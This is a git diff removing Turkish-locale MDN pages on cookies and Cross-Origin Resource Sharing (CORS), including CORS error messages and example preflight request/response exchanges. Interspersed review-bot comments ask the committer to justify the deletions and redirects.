about cookies. 
See for example Wikimedia Foundation's <a href="https://wikimediafoundation.org/wiki/Cookie_statement">cookie statement</a>.</p> - -<h3 id="Do-Not-Track">Do-Not-Track</h3> - -<p>There are no legal or technological requirements for its use, but the {{HTTPHeader("DNT")}} header can be used to signal that a web application should disable either its tracking or cross-site user tracking of an individual user. See the {{HTTPHeader("DNT")}} header for more information.</p> - -<h3 id="EU_cookie_directive">EU cookie directive</h3> - -<p>Requirements for cookies across the EU are defined in <a href="http://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX:32009L0136">Directive 2009/136/EC</a> of the European Parliament and came into effect on 25 May 2011. A directive is not a law by itself, but a requirement for EU member states to put laws in place that meet the requirements of the directive. The actual laws can differ from country to country.</p> - -<p>In short the EU directive means that before somebody can store or retrieve any information from a computer, mobile phone or other device, the user must give informed consent to do so. Many websites have added banners (AKA "cookie banners") since then to inform the user about the use of cookies.</p> - -<p>For more, see <a href="https://en.wikipedia.org/wiki/HTTP_cookie#EU_cookie_directive">this Wikipedia section</a> and consult state laws for the latest and most accurate information.</p> - -<h3 id="Zombie_cookies_and_Evercookies">Zombie cookies and Evercookies</h3> - -<p>A more radical approach to cookies are zombie cookies or "Evercookies" which are recreated after their deletion and are intentionally hard to delete forever. 
They are using the <a href="/en-US/docs/Web/API/Web_Storage_API" title="DOM Storage">Web storage API</a>, Flash Local Shared Objects and other techniques to recreate themselves whenever the cookie's absence is detected.</p> - -<ul> - <li><a href="https://github.com/samyk/evercookie">Evercookie by Samy Kamkar</a></li> - <li><a href="https://en.wikipedia.org/wiki/Zombie_cookie">Zombie cookies on Wikipedia</a></li> -</ul> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li>{{HTTPHeader("Set-Cookie")}}</li> - <li>{{HTTPHeader("Cookie")}}</li> - <li>{{domxref("Document.cookie")}}</li> - <li>{{domxref("Navigator.cookieEnabled")}}</li> - <li><a href="/tr/docs/Tools/Storage_Inspector">Inspecting cookies using the Storage Inspector</a></li> - <li><a class="external" href="https://tools.ietf.org/html/rfc6265">Cookie tanımı: RFC 6265</a></li> - <li><a href="https://en.wikipedia.org/wiki/HTTP_cookie">Wikipedia'da HTTP çerezi</a></li> -</ul> diff --git a/files/tr/web/http/cors/errors/corsrequestnothttp/index.html b/files/tr/web/http/cors/errors/corsrequestnothttp/index.html deleted file mode 100644 index b11ef3fd36..0000000000 --- a/files/tr/web/http/cors/errors/corsrequestnothttp/index.html +++ /dev/null 
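Review bot: the cookies page removed in the hunk above takes its Security section (session hijacking, CSRF tokens, SameSite) out of the tr tree, and the visible lines only delete, so nothing shows what the tr slug resolves to afterwards. The body is English apart from the "Bakınız" heading and two link labels ("Cookie tanımı: RFC 6265", "Wikipedia'da HTTP çerezi"), and its own cross-references already target /en-US/docs/Web/HTTP/Cookies#Security and #SameSite_cookies, so little translation is lost. Please state in the commit message whether the tr URL falls back to en-US or needs a redirect entry, so inbound links to this guidance keep working.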
@@ -1,31 +0,0 @@ ---- -title: 'Reason: CORS request not HTTP' -slug: Web/HTTP/CORS/Errors/CORSRequestNotHttp -tags: - - Güvenlik - - Hata - - Mesajlar - - Sebepler - - konsol -translation_of: Web/HTTP/CORS/Errors/CORSRequestNotHttp ---- -<div>{{HTTPSidebar}}</div> - -<h2 id="Sebep">Sebep</h2> - -<pre class="syntaxbox">Sebep: CORS isteği HTTP değil</pre> - -<h2 id="Yanlış_giden_ne">Yanlış giden ne?</h2> - -<p>{{Glossary("CORS")}} istekleri yalnızca HTTPS URL şemasını kullanabilir, ancak istek tarafından belirtilen URL farklı türdedir. Bu genellikle URL <code>file:///</code> kullanarak yerel bir dosya belirtirse olur.</p> - -<p>Bu sorunu çözmek için, CORS içeren isteklerde bulunurken HTTPS URL'leri kullandığınızdan emin olun.</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors">CORS hataları</a></li> - <li>Sözlük: {{Glossary("CORS")}}</li> - <li><a href="/en-US/docs/Web/HTTP/CORS">CORS'a giriş</a></li> - <li><a href="/en-US/docs/Learn/Common_questions/What_is_a_URL">URL nedir?</a></li> -</ul> diff --git a/files/tr/web/http/cors/errors/index.html b/files/tr/web/http/cors/errors/index.html deleted file mode 100644 index d1dd12dc75..0000000000 --- a/files/tr/web/http/cors/errors/index.html +++ /dev/null 
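Review bot: files/tr/web/http/cors/errors/corsrequestnothttp/index.html is a finished Turkish translation, not a stub: the tags (Güvenlik, Hata, Mesajlar, Sebepler, konsol), the headings "Sebep" and "Yanlış giden ne?" and both body paragraphs are translated, and only the title and the /en-US/ link targets under "Bakınız" are left in English. If the criterion for this cleanup is untranslated or stale content, this file does not obviously meet it, so the commit message should say why it is removed along with the others. If the page is kept or restored later, its statement that CORS requests may use only the HTTPS URL scheme should be checked against the current en-US source first.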
@@ -1,76 +0,0 @@ ---- -title: CORS errors -slug: Web/HTTP/CORS/Errors -tags: - - CORS - - Errors - - HTTP - - HTTPS - - Messages - - NeedsTranslation - - Same-origin - - Security - - TopicStub - - console - - troubleshooting -translation_of: Web/HTTP/CORS/Errors ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="seoSummary"><a href="/en-US/docs/Web/HTTP/CORS">Cross-Origin Resource Sharing</a> ({{Glossary("CORS")}}) is a standard that allows a server to relax the <a href="/en-US/docs/Web/Security/Same-origin_policy">same-origin policy</a>. This is used to explicitly allow some cross-origin requests while rejecting others.</span> For example, if a site offers an embeddable service, it may be necessary to relax certain restrictions. Setting up such a CORS configuration isn't necessarily easy and may present some challenges. In these pages, we'll look into some common CORS error messages and how to resolve them.</p> - -<p>If the CORS configuration isn't setup correctly, the browser console will present an error like <code>"Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at $somesite"</code> indicating that the request was blocked due to violating the CORS security rules. This might not necessarily be a set-up mistake, though. It's possible that the request is in fact intentionally being disallowed by the user's web application and remote external service. However, If the endpoint is meant to be available, some debugging is needed to succeed.</p> - -<h2 id="Identifying_the_issue">Identifying the issue</h2> - -<p>To understand the underlying issue with the CORS configuration, you need to find out which request is at fault and why. 
These steps may help you do so:</p> - -<ol> - <li>Navigate to the web site or web app in question and open the <a href="/en-US/docs/Tools">Developer Tools</a>.</li> - <li>Now try to reproduce the failing transaction and check the <a href="/en-US/docs/Tools/Web_Console">console</a> if you are seeing a CORS violation error message. It will probably look like this:</li> -</ol> - -<p><img alt="Firefox console showing CORS error" src="https://mdn.mozillademos.org/files/16050/cors-error2.png"></p> - -<p>The text of the error message will be something similar to the following:</p> - -<pre>Cross<span class="message-body-wrapper"><span class="message-flex-body"><span class="devtools-monospace message-body">-Origin Request Blocked: The Same Origin Policy disallows -reading the remote resource at <em>https://some-url-here</em>. (<em>Reason: -additional information here</em>).</span></span></span></pre> - -<div class="note"> -<p><span class="message-body-wrapper"><span class="message-flex-body"><span class="devtools-monospace message-body"><strong>Note:</strong> For security reasons, specifics about what went wrong with a CORS request <em>are not available to JavaScript code</em>. All the code knows is that an error occurred. The only way to determine what specifically went wrong is to look at the browser's console for details.</span></span></span></p> -</div> - -<h2 id="CORS_error_messages">CORS error messages</h2> - -<p>Firefox's console displays messages in its console when requests fail due to CORS. Part of the error text is a "reason" message that provides added insight into what went wrong. 
The reason messages are listed below; click the message to open an article explaining the error in more detail and offering possible solutions.</p> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSDisabled">Reason: CORS disabled</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSDidNotSucceed">Reason: CORS request did not succeed</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSOriginHeaderNotAdded">Reason: CORS header ‘Origin’ cannot be added</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSExternalRedirectNotAllowed">Reason: CORS request external redirect not allowed</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSRequestNotHttp">Reason: CORS request not http</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMissingAllowOrigin">Reason: CORS header ‘Access-Control-Allow-Origin’ missing</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSAllowOriginNotMatchingOrigin">Reason: CORS header ‘Access-Control-Allow-Origin’ does not match ‘xyz’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials">Reason: Credential is not supported if the CORS header ‘Access-Control-Allow-Origin’ is ‘*’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMethodNotFound">Reason: Did not find method in CORS header ‘Access-Control-Allow-Methods’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMissingAllowCredentials">Reason: expected ‘true’ in CORS header ‘Access-Control-Allow-Credentials’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSPreflightDidNotSucceed">Reason: CORS preflight channel did not succeed</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSInvalidAllowMethod">Reason: invalid token ‘xyz’ in CORS header ‘Access-Control-Allow-Methods’</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSInvalidAllowHeader">Reason: invalid token ‘xyz’ in CORS header ‘Access-Control-Allow-Headers’</a></li> - <li><a 
href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMissingAllowHeaderFromPreflight">Reason: missing token ‘xyz’ in CORS header ‘Access-Control-Allow-Headers’ from CORS preflight channel</a></li> - <li><a href="/en-US/docs/Web/HTTP/CORS/Errors/CORSMultipleAllowOriginNotAllowed">Reason: Multiple CORS header ‘Access-Control-Allow-Origin’ not allowed</a></li> -</ul> - -<h2 id="See_also">See also</h2> - -<ul> - <li>Glossary: {{Glossary("CORS")}}</li> - <li><a href="/en-US/docs/Web/HTTP/CORS">CORS introduction</a></li> - <li><a href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">Server-side CORS settings</a></li> - <li><a href="/en-US/docs/Web/HTML/CORS_enabled_image">CORS enabled image</a></li> - <li><a href="/en-US/docs/Web/HTML/CORS_settings_attributes">CORS settings attributes</a></li> - <li><a href="https://www.test-cors.org">https://www.test-cors.org</a> – page to test CORS requests</li> -</ul> diff --git a/files/tr/web/http/cors/index.html b/files/tr/web/http/cors/index.html deleted file mode 100644 index 2e7e690ab7..0000000000 --- a/files/tr/web/http/cors/index.html +++ /dev/null 
@@ -1,556 +0,0 @@ ---- -title: Cross-Origin Resource Sharing (CORS) -slug: Web/HTTP/CORS -translation_of: Web/HTTP/CORS ---- -<p><span class="seoSummary">Farklı Merkezler Arası Kaynak Paylaşımı (Yaygın olarak bilinen adıyla -</span>Cross-Origin Resource Sharing <span class="seoSummary">({{Glossary("CORS")}}) ) ek {{Glossary("HTTP")}} başlıkları (header)</span> kullanarak tarayıcıyla iletişime geçer ve farklı merkezler arasında gerçekleşen kaynak paylaşımı sırasında kaynak talep eden tarafın, kaynak sağlayan tarafça istenen izinlere sahip olup olmadığını tarayıcıya bildirir. Peki CORS ne zaman gerçekleşir. Hangi durumlarda merkezin farklı olduğu kabul edilir ? Bunu kısaca şöyle açıklayabiliriz, veri isteğinde bulunan taraf ile veri sağlayan taraflar arasında alan adı, protokol veya port farkı varsa tarafların farklı merkezlerde yer aldığı kabul edilmektedir.</p> - -<p>Olayı daha açık bir şekilde anlamak için aşağıdaki örneğe göz atalım. Aşağıda iki farklı merkez arasında veri paylaşımı gerçekleşmektedir.</p> - -<p><code>http://domain-a.com</code> uzantılı bir web sitemizin olduğunu ve sitemizde yer alan bazı modüllerin çalışması için <code>http://api.domain-b.com/data.json</code> sitesine ait API servisininden {{domxref("XMLHttpRequest")}} oluşturarak veri çektğimizi varsayalım. Burada doğrudan iki farklı domain söz konusu olduğu için, doğal olarak yaptığınız bu veri talebi tarayıcılar tarafından <strong>Farklı Kaynaklar Arası Veri Paylaşımı </strong>olarak görülecek ve isteğiniz bu bağlamda muamele görecektir.</p> - -<p>Güvenlik önemleri nedeniyle tarayıcılar farklı merkezler arasında yapılan HTTP isteklerini engellemektedir. Keza veri transferi amacıyla kullandığımız <code>XMLHttpRequest</code> ve <a href="/en-US/docs/Web/API/Fetch_API">Fetch API</a> tek merkez politikasına (<a href="/en-US/docs/Web/Security/Same-origin_policy">same-origin policy</a>) tabidirler. 
Dolayısıyla bir XMLHttpRequest oluşturduğunuzda veya Fetch API kullandığınızda eğer hedef siteniz ile veri trasferinde bulunmak için gerekli başlıklara (header) sahip değilseniz, tek merkez politikası nedeniyle gönderdiğiniz bu istekler tarayıcılar tarafından engellenecektir.</p> - -<p>Ancak istisnai olarak bazı web servislerinde bütün merkezler ile veri paylaşımı kabul edilmiş olabilir, herhangi bir kısıtlama olmayabilir, bu gibi servisler ile çalışırken herhangi bir ek başlığa sahip olmasanız dahi CORS hatası almaksızın, bu servisler ile veri transferinde bulunabilirsiniz.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/14295/CORS_principle.png" style="height: 305px; width: 440px;"></p> - -<p>CORS mekanizması tarayıcılar ve web servisleri arasında güvenli farklı merkezli istekleri ve veri transferlerini desteklemektedir .Modern tarayıcılar Farklı Merkezler Arası Kaynak Paylaşımı sistemini XMLHttpReqest ve Fetch gibi yapılar ile birlikte kullanarak, farklı merkezler arasında yapılan http isteklerini daha güvenli hale getirmeye çalışmaktadır. </p> - -<h2 id="Bu_makaleyi_kimler_okumalı">Bu makaleyi kimler okumalı?</h2> - -<p>Gerçekten herkes okumalı.</p> - -<p>Daha özelde, bu makale web adminleri, sunucu geliştiricileri ve front-end geliştiricileri içindir. Modern tarayıcılar, başlıklar ve poliçe uygulamaları dahil olmak üzere çapraz kaynak paylaşımının istemci tarafı bileşenlerini işler. Ancak bu yeni standart, sunucuların yeni request ve response headerlarını işlemesi gerektiği anlamına gelir. 
Diğer makale <a href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">çapraz-köken paylaşımını sunucu perspektifinden (PHP kod parçacıklarıyla)</a> tartışan sunucu geliştiricileri için tamamlayıcı bir okumadır.</p> - -<h2 id="Hangi_istekler_CORS_kullanır">Hangi istekler CORS kullanır?</h2> - -<p>Bu <a class="external" href="https://fetch.spec.whatwg.org/#http-cors-protocol">çapraz-köken paylaşma standardı</a> siteler arası HTTP isteklerini etkinleştirmek için kullanılır:</p> - -<ul> - <li>Yukarıda tartışıldığı gibi {{domxref("XMLHttpRequest")}} veya <a href="/en-US/docs/Web/API/Fetch_API">Fetch API'lerinin</a> çağrıları.</li> - <li>Web Fontları (CSS içindeki <code>@font-face</code> içinde çapraz-domain font kullanımı için), <a class="external" href="https://www.w3.org/TR/css-fonts-3/#font-fetching-requirements">böylece sunucular yalnızca izin verilen web siteleri tarafından siteler arası yüklenebilen ve kullanılabilen TrueType fontları dağıtabilir.</a></li> - <li><a href="/en-US/docs/Web/API/WebGL_API/Tutorial/Using_textures_in_WebGL">WebGL texture'ları</a>.</li> - <li>{{domxref("CanvasRenderingContext2D.drawImage()", "drawImage()")}} kullanılarak bir tuvale çizilen resimler/video çerçeveleri.</li> - <li><a href="https://wiki.developer.mozilla.org/en-US/docs/Web/CSS/CSS_Shapes/Shapes_From_Images">Resimlerden CSS şekilleri. </a></li> -</ul> - -<p>Bu makale, Çapraz-Köken Arası Kaynak Paylaşımı hakkında genel bir tartışmadır ve gerekli HTTP headerlarının bir tartışmasını içerir.</p> - -<h2 id="Fonksiyonel_genel_bakış">Fonksiyonel genel bakış</h2> - -<p>Çapraz-Köken Kaynak Paylaşımı standardı, hangi originlerin bir web tarayıcısından istenilen bilgiyi okumalarına izin verildiğini sunucuların tanımlamasına izin veren yeni <a href="/en-US/docs/Web/HTTP/Headers">HTTP headerlarını</a> ekleyerek çalışır. 
Ayrıca, sunucu verileri üzerinde yan etkilere neden olabilecek HTTP istek yöntemleri için (özellikle, {{HTTPMethod ("GET")}} veya {{HTTPMethod ("POST")}} dışında belirli <a href="/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types">MIME tiplerindeki</a> HTTP yöntemleri), şartname, tarayıcıların HTTP {{HTTPMethod ("OPTIONS")}} istek yöntemiyle desteklenen yöntemleri sunucudan talep ederek isteği "preflight" ve ardından sunucudan "approval" aldıktan sonra asıl isteği göndermesini zorunlu kılar. Sunucular ayrıca istemcilere "credentials"(<a href="/en-US/docs/Web/HTTP/Cookies">Cookie'ler</a> ve <a href="https://wiki.developer.mozilla.org/en-US/docs/Web/HTTP/Authentication">HTTP kimlik doğrulama</a> verileri dahil) bilgisinin istekler ile gönderilip gönderilmeyeceğini bildirebilir.</p> - -<p>CORS başarısızlıkları hatalara neden olur, ancak güvenlik sebepleri için hata ile ilgili ayrıntılar <em>JavaScript tarafından erişilemez</em>. Kodun bildiği tek şey bir hata oluşmasıdır. Özellikle neyin yanlış gittiğini belirlemenin tek yolu, ayrıntılar için tarayıcının konsoluna bakmaktır.</p> - -<p>Sonraki bölümler senaryoları tartışır ve kullanılan HTTP headerlarının analizini sağlar.</p> - -<h2 id="Examples_of_access_control_scenarios">Examples of access control scenarios</h2> - -<p>Here, we present three scenarios that illustrate how Cross-Origin Resource Sharing works. 
All of these examples use the {{domxref("XMLHttpRequest")}} object, which can be used to make cross-site invocations in any supporting browser.</p> - -<p>The JavaScript snippets included in these sections (and running instances of the server-code that correctly handles these cross-site requests) can be found "in action" at <a class="external" href="http://arunranga.com/examples/access-control/">http://arunranga.com/examples/access-control/</a>, and will work in browsers that support cross-site <code>XMLHttpRequest</code>.</p> - -<p>A discussion of Cross-Origin Resource Sharing from a server perspective (including PHP code snippets) can be found in the <a class="internal" href="/en-US/docs/Web/HTTP/Server-Side_Access_Control">Server-Side Access Control (CORS)</a> article.</p> - -<h3 id="Simple_requests">Simple requests</h3> - -<p>Some requests don’t trigger a <a href="#Preflighted_requests">CORS preflight</a>. Those are called “simple requests” in this article, though the {{SpecName('Fetch')}} spec (which defines CORS) doesn’t use that term. 
A request that doesn’t trigger a <a href="#Preflighted_requests">CORS preflight</a>—a so-called “simple request” — is one that <strong>meets all the following conditions</strong>:</p> - -<ul> - <li>The only allowed methods are: - <ul> - <li>{{HTTPMethod("GET")}}</li> - <li>{{HTTPMethod("HEAD")}}</li> - <li>{{HTTPMethod("POST")}}</li> - </ul> - </li> - <li>Apart from the headers set automatically by the user agent (for example, {{HTTPHeader("Connection")}}, {{HTTPHeader("User-Agent")}}, or <a href="https://fetch.spec.whatwg.org/#forbidden-header-name">any of the other headers with names defined in the Fetch spec as a “forbidden header name”</a>), the only headers which are allowed to be manually set are <a href="https://fetch.spec.whatwg.org/#cors-safelisted-request-header">those which the Fetch spec defines as being a “CORS-safelisted request-header”</a>, which are: - <ul> - <li>{{HTTPHeader("Accept")}}</li> - <li>{{HTTPHeader("Accept-Language")}}</li> - <li>{{HTTPHeader("Content-Language")}}</li> - <li>{{HTTPHeader("Content-Type")}} (but note the additional requirements below)</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#dpr">DPR</a></code></li> - <li>{{HTTPHeader("Downlink")}}</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#save-data">Save-Data</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#viewport-width">Viewport-Width</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#width">Width</a></code></li> - </ul> - </li> - <li>The only allowed values for the {{HTTPHeader("Content-Type")}} header are: - <ul> - <li><code>application/x-www-form-urlencoded</code></li> - <li><code>multipart/form-data</code></li> - <li><code>text/plain</code></li> - </ul> - </li> - <li>No event listeners are registered on any {{domxref("XMLHttpRequestUpload")}} object used in the request; these are accessed using the 
{{domxref("XMLHttpRequest.upload")}} property.</li> - <li>No {{domxref("ReadableStream")}} object is used in the request.</li> -</ul> - -<div class="note"><strong>Note:</strong> These are the same kinds of cross-site requests that web content can already issue, and no response data is released to the requester unless the server sends an appropriate header. Therefore, sites that prevent cross-site request forgery have nothing new to fear from HTTP access control.</div> - -<div class="note"><strong>Note:</strong> WebKit Nightly and Safari Technology Preview place additional restrictions on the values allowed in the {{HTTPHeader("Accept")}}, {{HTTPHeader("Accept-Language")}}, and {{HTTPHeader("Content-Language")}} headers. If any of those headers have ”non-standard” values, WebKit/Safari does not consider the request to meet the conditions for a “simple request”. What WebKit/Safari considers “non-standard” values for those headers is not documented except in the following WebKit bugs: <a href="https://bugs.webkit.org/show_bug.cgi?id=165178" rel="nofollow noreferrer">Require preflight for non-standard CORS-safelisted request headers Accept, Accept-Language, and Content-Language</a>, <a href="https://bugs.webkit.org/show_bug.cgi?id=165566" rel="nofollow noreferrer">Allow commas in Accept, Accept-Language, and Content-Language request headers for simple CORS</a>, and <a href="https://bugs.webkit.org/show_bug.cgi?id=166363" rel="nofollow noreferrer">Switch to a blacklist model for restricted Accept headers in simple CORS requests</a>. No other browsers implement those extra restrictions, because they’re not part of the spec.</div> - -<p>For example, suppose web content on domain <code class="plain">http://foo.example</code> wishes to invoke content on domain <code class="plain">http://bar.other</code>. 
Code of this sort might be used within JavaScript deployed on foo.example:</p> - -<pre class="brush: js" id="line1">const invocation = new XMLHttpRequest(); -const url = 'http://bar.other/resources/public-data/'; - -function callOtherDomain() { - if(invocation) { - invocation.open('GET', url, true); - invocation.onreadystatechange = handler; - invocation.send(); - } -} -</pre> - -<p>This will lead to a simple exchange between the client and the server, using CORS headers to handle the privileges:</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/14293/simple_req.png" style="height: 224px; width: 521px;"></p> - -<p>Let us look at what the browser will send to the server in this case, and let's see how the server responds:</p> - -<pre class="brush: shell;highlight:[10,16]">GET /resources/public-data/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -Referer: http://foo.example/examples/access-control/simpleXSInvocation.html -Origin: http://foo.example - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 00:23:53 GMT -Server: Apache/2.0.61 -Access-Control-Allow-Origin: * -Keep-Alive: timeout=2, max=100 -Connection: Keep-Alive -Transfer-Encoding: chunked -Content-Type: application/xml - -[XML Data] -</pre> - -<p>Lines 1 - 10 are headers sent. The main HTTP request header of note here is the {{HTTPHeader("Origin")}} header on line 10 above, which shows that the invocation is coming from content on the domain <code class="plain">http://foo.example</code>.</p> - -<p>Lines 13 - 22 show the HTTP response from the server on domain <code class="plain">http://bar.other</code>. 
In response, the server sends back an {{HTTPHeader("Access-Control-Allow-Origin")}} header, shown above in line 16. The use of the {{HTTPHeader("Origin")}} header and of {{HTTPHeader("Access-Control-Allow-Origin")}} show the access control protocol in its simplest use. In this case, the server responds with a <code>Access-Control-Allow-Origin: *</code> which means that the resource can be accessed by <strong>any</strong> domain in a cross-site manner. If the resource owners at <code class="plain">http://bar.other</code> wished to restrict access to the resource to requests only from <code class="plain">http://foo.example</code>, they would send back:</p> - -<p><code class="plain">Access-Control-Allow-Origin: http://foo.example</code></p> - -<p>Note that now, no domain other than <code class="plain">http://foo.example</code> (identified by the ORIGIN: header in the request, as in line 10 above) can access the resource in a cross-site manner. The <code>Access-Control-Allow-Origin</code> header should contain the value that was sent in the request's <code>Origin</code> header.</p> - -<h3 id="Preflighted_requests">Preflighted requests</h3> - -<p>Unlike <a href="#Simple_requests">“simple requests” (discussed above)</a>, "preflighted" requests first send an HTTP request by the {{HTTPMethod("OPTIONS")}} method to the resource on the other domain, in order to determine whether the actual request is safe to send. 
Cross-site requests are preflighted like this since they may have implications to user data.</p> - -<p>In particular, a request is preflighted if <strong>any of the following conditions</strong> is true:</p> - -<ul> - <li><strong>If</strong> the request uses any of the following methods: - - <ul> - <li>{{HTTPMethod("PUT")}}</li> - <li>{{HTTPMethod("DELETE")}}</li> - <li>{{HTTPMethod("CONNECT")}}</li> - <li>{{HTTPMethod("OPTIONS")}}</li> - <li>{{HTTPMethod("TRACE")}}</li> - <li>{{HTTPMethod("PATCH")}}</li> - </ul> - </li> - <li><strong>Or if</strong>, apart from the headers set automatically by the user agent (for example, {{HTTPHeader("Connection")}}, {{HTTPHeader("User-Agent")}}, or <a href="https://fetch.spec.whatwg.org/#forbidden-header-name">any of the <strong>OTHER</strong> header with a name defined in the Fetch spec as a “forbidden header name”</a>), the request includes any headers other than <a href="https://fetch.spec.whatwg.org/#cors-safelisted-request-header">those which the Fetch spec defines as being a “CORS-safelisted request-header”</a>, which are the following: - <ul> - <li>{{HTTPHeader("Accept")}}</li> - <li>{{HTTPHeader("Accept-Language")}}</li> - <li>{{HTTPHeader("Content-Language")}}</li> - <li>{{HTTPHeader("Content-Type")}} (but note the additional requirements below)</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#dpr">DPR</a></code></li> - <li>{{HTTPHeader("Downlink")}}</li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#save-data">Save-Data</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#viewport-width">Viewport-Width</a></code></li> - <li><code><a href="http://httpwg.org/http-extensions/client-hints.html#width">Width</a></code></li> - </ul> - </li> - <li><strong>Or if</strong> the {{HTTPHeader("Content-Type")}} header has a value <strong>OTHER THAN</strong> the following: - <ul> - <li><code>application/x-www-form-urlencoded</code></li> - 
<li><code>multipart/form-data</code></li> - <li><code>text/plain</code></li> - </ul> - </li> - <li><strong>Or if</strong> one or more event listeners are registered on an {{domxref("XMLHttpRequestUpload")}} object used in the request.</li> - <li><strong>Or if</strong> a {{domxref("ReadableStream")}} object is used in the request.</li> -</ul> - -<div class="note"><strong>Note:</strong> WebKit Nightly and Safari Technology Preview place additional restrictions on the values allowed in the {{HTTPHeader("Accept")}}, {{HTTPHeader("Accept-Language")}}, and {{HTTPHeader("Content-Language")}} headers. If any of those headers have ”non-standard” values, WebKit/Safari preflights the request. What WebKit/Safari considers “non-standard” values for those headers is not documented except in the following WebKit bugs: <a href="https://bugs.webkit.org/show_bug.cgi?id=165178" rel="nofollow noreferrer">Require preflight for non-standard CORS-safelisted request headers Accept, Accept-Language, and Content-Language</a>, <a href="https://bugs.webkit.org/show_bug.cgi?id=165566" rel="nofollow noreferrer">Allow commas in Accept, Accept-Language, and Content-Language request headers for simple CORS</a>, and <a href="https://bugs.webkit.org/show_bug.cgi?id=166363" rel="nofollow noreferrer">Switch to a blacklist model for restricted Accept headers in simple CORS requests</a>. 
No other browsers implement those extra restrictions, because they’re not part of the spec.</div> - -<p>The following is an example of a request that will be preflighted.</p> - -<pre class="brush: js" id="line1">const invocation = new XMLHttpRequest(); -const url = 'http://bar.other/resources/post-here/'; -const body = '<?xml version="1.0"?><person><name>Arun</name></person>'; - -function callOtherDomain(){ - if(invocation) - { - invocation.open('POST', url, true); - invocation.setRequestHeader('X-PINGOTHER', 'pingpong'); - invocation.setRequestHeader('Content-Type', 'application/xml'); - invocation.onreadystatechange = handler; - invocation.send(body); - } -} - -...... -</pre> - -<p>In the example above, line 3 creates an XML body to send with the <code>POST</code> request in line 8. Also, on line 9, a "customized" (non-standard) HTTP request header is set (<code>X-PINGOTHER: pingpong</code>). Such headers are not part of the HTTP/1.1 protocol, but are generally useful to web applications. Since the request uses a Content-Type of <code>application/xml</code>, and since a custom header is set, this request is preflighted.</p> - -<p><img alt="" src="https://mdn.mozillademos.org/files/16401/preflight_.png" style="height: 555px; width: 538px;"></p> - -<p>(Note: as described below, the actual POST request does not include the Access-Control-Request-* headers; they are needed only for the OPTIONS request.)</p> - -<p>Let's take a look at the full exchange between client and server. 
The first exchange is the <em>preflight request/response</em>:</p> - -<pre class="brush: none;highlight:[1,10,11,17-20]">OPTIONS /resources/post-here/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -Origin: http://foo.example -Access-Control-Request-Method: POST -Access-Control-Request-Headers: X-PINGOTHER, Content-Type - - -HTTP/1.1 200 OK -Date: Mon, 01 Dec 2008 01:15:39 GMT -Server: Apache/2.0.61 (Unix) -Access-Control-Allow-Origin: http://foo.example -Access-Control-Allow-Methods: POST, GET, OPTIONS -Access-Control-Allow-Headers: X-PINGOTHER, Content-Type -Access-Control-Max-Age: 86400 -Vary: Accept-Encoding, Origin -Content-Encoding: gzip -Content-Length: 0 -Keep-Alive: timeout=2, max=100 -Connection: Keep-Alive -Content-Type: text/plain -</pre> - -<p>Once the preflight request is complete, the real request is sent:</p> - -<pre class="brush: none;">POST /resources/post-here/ HTTP/1.1 -Host: bar.other -User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081130 Minefield/3.1b3pre -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-us,en;q=0.5 -Accept-Encoding: gzip,deflate -Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 -Connection: keep-alive -X-PINGOTHER: pingpong -Content-Type: text/xml; charset=UTF-8 -Referer: http://foo.example/examples/preflightInvocation.html -Content-Length: 55 -Origin: http://foo.example -Pragma: no-cache -Cache-Control: no-cache - -<?xml version="1.0"?><person><name>Arun</name></person> 